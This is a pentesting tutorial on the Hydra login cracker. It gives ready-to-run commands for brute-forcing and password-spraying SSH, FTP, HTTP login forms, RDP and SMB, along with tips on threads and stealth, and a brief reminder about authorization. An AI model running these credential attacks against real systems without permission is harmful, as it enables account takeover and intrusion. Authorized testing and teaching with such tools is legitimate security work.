Hydra: Brute Force Hacking Like a Pro
Hydra is a fast and flexible login cracker. It’s one of the most essential tools in a pentester’s arsenal when credentials are unknown and brute-forcing is on the table. Whether you’re testing SSH, HTTP forms, or even RDP, Hydra gets the job done with speed and precision.
In this post, we’ll cover everything a pentester needs to know to master Hydra — with examples, syntax, tips, and attack scenarios.
What Is Hydra?
Hydra (sometimes referred to as THC-Hydra) is a parallelized login cracker that supports numerous protocols, both remote and local. It’s ideal for performing dictionary attacks against services where usernames and passwords are required.
Key Use Cases for Pentesters
- Brute-forcing SSH logins
- Cracking HTTP login forms
- Testing default credentials on FTP, Telnet, RDP, and more
- Password spraying with control over speed and threads
Supported Services
Hydra supports a wide range of protocols. Some of the most common ones in real-world pentests include:
http-get, http-post-form, ssh, ftp, telnet, smb, rdp, vnc, smtp, pop3, imap, ldap2, ldap3, mysql, postgres, mssql
You can view all supported modules using:
hydra -U # List supported services
Basic Syntax
hydra -L users.txt -P passwords.txt <protocol>://<target>
Or using specific service format:
hydra -L users.txt -P passwords.txt ssh://192.168.1.10
Common Flags:
-L # Username list
-l # Single username
-P # Password list
-p # Single password
-s # Custom port
-V # Verbose output (every attempt shown)
-f # Exit after first valid login found
-t # Number of parallel tasks (threads)
-o # Output results to file
Hydra in Action: Real-World Examples
1. Brute Force SSH
hydra -L users.txt -P rockyou.txt ssh://192.168.1.100 -t 4 -f
# -t 4: Use 4 threads
# -f: Stop after first success
2. Brute Force FTP with Default Port
hydra -l admin -P passwords.txt ftp://192.168.1.20
3. HTTP POST Form Attack
hydra -l admin -P passwords.txt 192.168.1.50 http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect"
# ^USER^ and ^PASS^ are replaced dynamically
# "F=incorrect" is the failure condition in the response
To find what text to use in the failure condition, inspect the response from failed logins in Burp Suite or the browser.
4. RDP Brute Force
hydra -L users.txt -P passwords.txt rdp://192.168.1.25
5. SMB Brute Force
hydra -L users.txt -P passwords.txt smb://192.168.1.30
Fine-Tuning Your Attack
Set Threads for Speed
-t 16 # Use 16 threads to speed up the attack
Use responsibly. Too many threads can trigger account lockouts or detection systems.
Stop After First Hit
-f # Exit on first valid credentials
Useful for stealth or when only one set of credentials is needed.
Output to File
-o results.txt
Keeps a log of successful attempts and error details.
Advanced Tips
1. Password Spraying with One Password
hydra -L users.txt -p Spring2024 ssh://192.168.1.100 -t 6
# Try same password across many users — common during internal pentests
2. Single User, Many Passwords
hydra -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.0.0.5 -V
3. Custom Ports
hydra -L users.txt -P passwords.txt -s 2222 ssh://192.168.1.100
# Use if SSH is running on a non-standard port
Hydra vs Medusa vs Ncrack
| Tool | Highlights |
|---|---|
| Hydra | Wide protocol support, flexible |
| Medusa | Faster in some multi-user scenarios |
| Ncrack | Best for RDP and brute force speed |
Final Thoughts
Hydra is a powerful brute-forcing tool, but it’s up to you to use it responsibly. Always validate scope and authorization. In internal tests, it can quickly uncover weak credentials, default logins, or exposed admin panels — all leading to deeper compromise.
Next time you’re stuck at a login prompt with a username and a hunch? Let Hydra loose.